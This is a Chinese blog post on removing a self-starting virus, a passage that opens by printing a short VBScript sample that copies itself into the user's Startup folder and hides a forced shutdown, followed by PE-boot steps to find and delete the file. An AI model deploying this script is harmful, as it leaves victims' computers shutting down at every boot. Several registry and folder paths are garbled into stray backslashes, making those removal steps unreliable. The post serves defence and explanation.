如何删除开机自启动的病毒

P.S.(1)此文中的方法也适用于其他开机自启的病毒 。
话说那年,那月,那一天,有一个大佬发了一篇博文,结果↓↓↓
啊!可怜的人!我们先来看看那个病毒:
on error resume next set wr=createobject("scripting.filesystemobject") set ws=createobject("wscript.shell") set f = wr.getfile(wscript.scriptfullname) q=ws.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup") if not f="Win32.vbs" then wr.copyfile f,q&"\Win32.vbs",true ws.run"shutdown -p",vbhide
运行一下:
嗯,果然厉害,开了机就关机 。
P.S.(2)这位大佬的病毒怎么样?厉不厉害?如果你想看其他病毒,那么请看此文 。
不过,还是有解决方法的:
1.打开电脑,狂摁F12(根据电脑机型可能有所不同)

如何删除开机自启动的病毒

文章插图
2.插上启动U盘(怎么做启动U盘上网查),然后启动
(如是虚拟机,可能得reset一下(倒数第2项),然后再狂摁F12)
(注:选中(↑、↓键)后摁Enter)
然后等着进度条跑完,最后是这样的:
现在电脑能使了,然后跟我来:
1.我们分析一下病毒,发现它是通过修改‘\\\\\\Shell \’注册表项来开机自启的 。
2.然后我们打开C:\\.exe,再打开
\\\\\\Shell \,发现无效(如图) 。
如何删除开机自启动的病毒

文章插图
这是为什么呢?这是因为:注册表里压根没这一项(指PE模式)!
实际上,它是‘\\\\\\User Shell \’,其值为C:\Users\****\\\\\Start Menu\\ 。(注:****为你的用户名,并且,在PE模式中其值有所不同)
【如何删除开机自启动的病毒】我们打开自己的用户文件夹,然后把‘\’及以后的内容粘贴到导航栏里,如图:
然后,我们发现里面有一个VBS文件,将其删除即可 。如图所示:
接着,重启电脑,如图:
Great!电脑没事啦!!!
P.S.(3) 完成本博文共花了我约1个半小时的时间,非常辛苦,故如果此文帮到了你,请点赞+转发+打赏吧!
P.S.(4)(今天的P.S.真够多的) 版权所有,侵犯必究!